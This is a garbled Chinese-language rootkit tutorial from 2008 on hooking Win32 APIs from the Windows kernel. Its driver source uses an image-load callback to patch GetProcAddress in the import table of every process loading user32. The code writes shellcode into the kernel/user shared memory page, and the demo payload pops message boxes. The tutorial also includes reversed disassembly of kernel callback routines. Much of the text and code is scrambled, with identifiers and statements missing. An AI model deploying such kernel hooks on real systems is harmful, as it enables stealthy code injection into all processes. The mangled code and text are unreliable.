安全進(jìn)階1內(nèi)核hook7iat今天這篇主要是講在中HOOKWIN32API辦

標(biāo)題:【】rootkithook之[七]IAT作者:時(shí)間:2008-03-鏈接: HOOK,HOOKWIN32APIDLLHOOKAPIhook7在內(nèi)核中hookwin32api需要用scode的東西。因此在內(nèi)核中hookwin32api也具有。因這里有個(gè)問(wèn)題要解決，就是你的hook函數(shù)是在ring0中實(shí)現(xiàn)的，ring3如何能到呢？俗話說(shuō)，天無(wú)絕人，總會(huì)有解決辦法的。就是BarnabyJack在 “RemoteWindowsKernelExploitation:StepintotheRing0”中所用的技術(shù)。它利用了兩個(gè)虛地址映射到同一個(gè)物理地址這個(gè)事實(shí)。內(nèi)核地址0xFFDF0000和用戶地址0x7FFE0000都指向同一物理頁(yè)面。內(nèi)核地址是可寫的，但用戶地址則不能。lkd>dt+0x000 :+0x004TickCountMultiplier:+0x008 :+0x014 :+0x020 :+0x02c :+0x02e :+0x030 :[260]+0x238MaxStackTraceDepth:+0x23c :+0x240 :+0x244 :[8]+0x264 :+0x268ProductTypeIsValid:+0x26c :+0x270 :+0x274ProcessorFeatures:[64]+0x2b4 :+0x2b8 :+0x2bc :+0x2c0AlternativeArchitecture:+0x2c8SystemExpirationDate:+0x2d0 :+0x2d4KdDebuggerEnabled:+0x2d5NXSupport:+0x2d8 :+0x2dc :+0x2e0 :+0x2e4LastSystemRITEventTickCount:+0x2e8NumberOfPhysicalPages:+0x2ec :+0x2f0 :+0x2f8TestRetInstruction:+0x300 :+0x304SystemCallReturn:+0x308 :[3]+0x320 :+0x320 :+0x330 :Uint4B4K0x1000,0x334我們當(dāng)然可以利用了。demo8002047hookring0ring3IAThookhookapi,例hookGetProcAddress。我們把要執(zhí)行的函數(shù)寫入共享區(qū)中.IATHOOK寫入的函數(shù)的地址。當(dāng)用戶程序調(diào)用GetProcAddressapi函數(shù)的時(shí)候，共享區(qū)中的這段scode碼便被執(zhí)行了。我們demo是指要調(diào)用GetProcAddress的地方都會(huì)彈出一個(gè)框。簡(jiǎn)單寫一個(gè)scode如下#includeintmain(intargc,char*{HMODULEhM={

pushcallpopsubebp,offsetjmp _emit_emit_emit_emit

//GetProcAddressIAT_emit_emit_emit_emit0x7cpush0xcall_emit_emit_emit_emit_emit_emit_emit_emit

call_emit_emit_emit_emit_emit_emit_emit_emit_emit_emit_emit_emit

pushleaeax,[ebp+fun1]call[eax]leaeax,[ebp+fun2]popebpjmpDWORD}return}0x10,0x40,0x00,0xE9,0x08,0x10,0x40,0x00,0xE9,0x08,0x00,0x02,

0x55,0xE8,0x00,0x00,0x00,呵呵，自從掛接了這個(gè)驅(qū)動(dòng)，我的機(jī)器里面，隨便啟動(dòng)個(gè)程序，就不停的彈出窗口了。下面貼出代碼NTSTATUSDriverEntry(INPDRIVER_OBJECTINPUNICODE_STRING{NTSTATUSgb_Hooked=FALSE;//WehavenothookedyetntStatus=PsSetLoadImageNotifyRoutine(MyImageLoadNotify);return}VOIDMyImageLoadNotify(IN IN Proce,//Processimageis{UNICODE_STRING

IN DbgPrint("Imagename:%ws\n",FullImageName-//SetupthenameoftheDLLtotargetRtlInitUnicodeString(&u_targetDLL,L"\\WINDOWS\\system32\\user32if pareUnicodeString(FullImageName,{DbgPrint("imageInfo- ProceeHookIAT(&u_targetDLL,"GetProcAddress",Proce}}NTSTATUSHookIAT(PUNICODE_STRINGpModuleName,PCHARpFunctionName, {ULONGPLIST_ENTRYpCurrentList=NULL,pTempList=NULL,pLoadOrderModuleList,list;PPEBpPeb=NULL;ULONGhModule,temp;pPeb=(PPEB)(*(PULONG)(pEProcess+PEBOFFSET));if(pPeb!={ //pLoadOrderModuleList=pPeb->LoaderData->InLoadOrderModuleList.Flink;list=pLoadOrderModuleList; //EXE{UNICODE_STRINGpstrTemp=((PLDR_MODULE)list)->FullDllName;DbgPrint("modulename=%ws\n\n\n\n",pstrTemp.Buffer);if(wcsstr(pstrTemp.Buffer,L".exe")!={hModule=(ULONG)((PLDR_MODULE)list)-temp=DbgPrint("FindModulebaseAaddress=

}

HookImportsOfImage((PIMAGE_DOS_HEADER)hModule,Procelist=list-}while(list!=pLoadOrderModuleList);}return}NTSTATUSHookImportsOfImage(PIMAGE_DOS_HEADERimage_addr,HANDLEh_proc,PCHAR){PIMAGE_DOS_HEADERdosHeader;PIMAGE_NT_HEADERSPIMAGE_IMPORT_DESCRIPTORimportDesc;PIMAGE_IMPORT_BY_NAMEp_ibn;DWORDimportsStartRVA;PDWORDpd_IAT,pd_INTO;intcount,char*dll_name=char*pc_dlltar="kernel32.dll"; PDWORDDWORDd_sharedM=0x7ffe0800;DWORDd_sharedK=unsignedcharnew_code[]=

0x55,0xE8,0x00,0x00,0x10,0x40,0x00,0xE9,0x08,0x00,0x00,0x00,0x02,6A,8d,

0x8d,0x85,0x51,0x10,0x40,0x00,0xFF,0x10,0x55,0x10,0x40,0x00,0x5d,0xFF,dosHeader=(PIMAGE_DOS_HEADER)pNTHeader=MakePtr(PIMAGE_NT_HEADERS,dosHeader->e_lfanew//First,verifythatthee_lfanewfieldgaveusa//pointer,thenverifythePEif(pNTHeader->Signature!=IMAGE_NT_SIGNATURE)returnSTATUS_INVALID_IMAGE_FORMAT;importsStartRVA=pNTHeader-ifreturnimportDesc=(PIMAGE_IMPORT_DESCRIPTOR)(importsStartRVA+(DWORD)dosHeader);for(count=0;importDesc[count].Characteristics!=0;count++){dll_name=(char*)(importDesc[count].Name+(DWORD)dosHeader);DbgPrint("ImportsfromDLL:%s",dll_name);

pd_IAT=(PDWORD)(((DWORD)dosHeader)+(DWORD)importDesc[count].FirstThunk);pd_INTO=(PDWORD)(((DWORD)dosHeader)+(DWORD)importDesc[count].OriginalFirstfor(index=0;pd_IAT[index]!=0;{DbgPrint("ImportsfromDLL:%s",dll_name);DbgPrint("Address:%x\n\n\n\n", //Ifthisisanimportbyordinalthe//bitisif((pd_INTO[index]&IMAGE_ORDINAL_FLAG)!={p_ibn=(PIMAGE_IMPORT_BY_NAME)(pd_INTO[index]+((DWORD)dosHeader));if((_stricmp(dll_name,pc_dlltar)==0)&&\(strcmp(p_ibn->Name,pc_fnctar)=={DbgPrint("ImportsfromDLL:%s",DbgPrint("Name:%sAddress:%x\n",p_ibn->Name,//Usethetrickyoualreadylearnedtomapa//virtualaddresstothesamephysicalpageso//permission//MapthememoryintooursowecanchangethepermissionsontheMDLp_mdl=MmCreateMdl(NULL,&pd_IAT[index],4);return//Changetheflagsofthep_mdl->MdlFlags=p_mdl->MdlFlags|MDL_MAPPED_TO_SYSTEM_VA;MappedImTable=MmMapLockedPages(p_mdl,KernelMode);if{//Writingtherawopcodesto//usedakerneladdressthatgets//intotheaddressspaceofall//thankstoBarnabyJack RtlCopyMemory((PVOID)d_sharedK,new_code,RtlCopyMemory((PVOID)(d_sharedK+22),(PVOID)&pd_IAT[index], gb_Hooked=}//Offsettothe"new*MappedImTable=//MmUnmapLockedPages(MappedImTable,p_mdl);}}}}return}lkd>ul805c609e805c60a0805c60a1805c60a3805c60a4805c60a5edidwordptr805c60ab nt!ExAllocateCallBack c)805c60b0 ebx,eaxnt!PsSetLoadImageNotifyRoutine+0x1fnt!PsSetLoadImageNotifyRoutine+0x49805c60bd 805c60bebee0a75580 esi,offsetnt!PspLoadImageNotifyRoutine(80550pareExchangeCallBack(806031ac)805c60ce751dc60ed)；nt!PsSetLoadImageNotifyRoutine+0x4f805c60d0805c60d3805c60d6805c60d9nt!PsSetLoadImageNotifyRoutine+0x25Privileges805c60e1 4805c60ed 805c60f2b9c8a75580 ecx,offsetnt!PspLoadImageNotifyRoutineCount(8805c60f7 dwordptrptr[nt!PsImageNotifyEnablednt!PsSetLoadImageNotifyRoutine+0x48逆向?yàn)閏NTSTATUSIN ){ULONGPEX_CALLBACK_ROUTINE_BLOCKCallBack=ExAllocateCallBack(NotifyRoutine,NULL);if(CallBack==NULL)returnfor(i=0;i<0x20/4;{ ){

InterlockedIncrement(&PspLoadImageNotifyRoutineCountPsImageNotifyEnable=TRUE;returnSTATUS_SUCCESS;}}CallBackSePrivilegesreturn}lkd>uExAllocateCallBackl30cefh1ant!ExAllocatePoolWithTag fnt!ExAllocateCallBack+0x26ecx,dwordptrdwordptrdwordptrcecx,dwordptrfdwordptr8逆向?yàn)閏typedefstruct_EX_CALLBACK_ROUTINE_BLOCK{ PEX_CALLBACK_FUNCTIONFunction; }EX_CALLBACK_ROUTINE_BLOCK, ExAllocateCallBack(INPEX_CALLBACK_FUNCTIONFunction,INPVOID){ CallBack=ExAllocatePoolWithTag(1,0x0c,0x {CallBack->RundownProtect=0;CallBack->Function=Function;CallBack->Context=Context;}}lkd>uSePrivileges805e61ee 805e61f0 805e61f1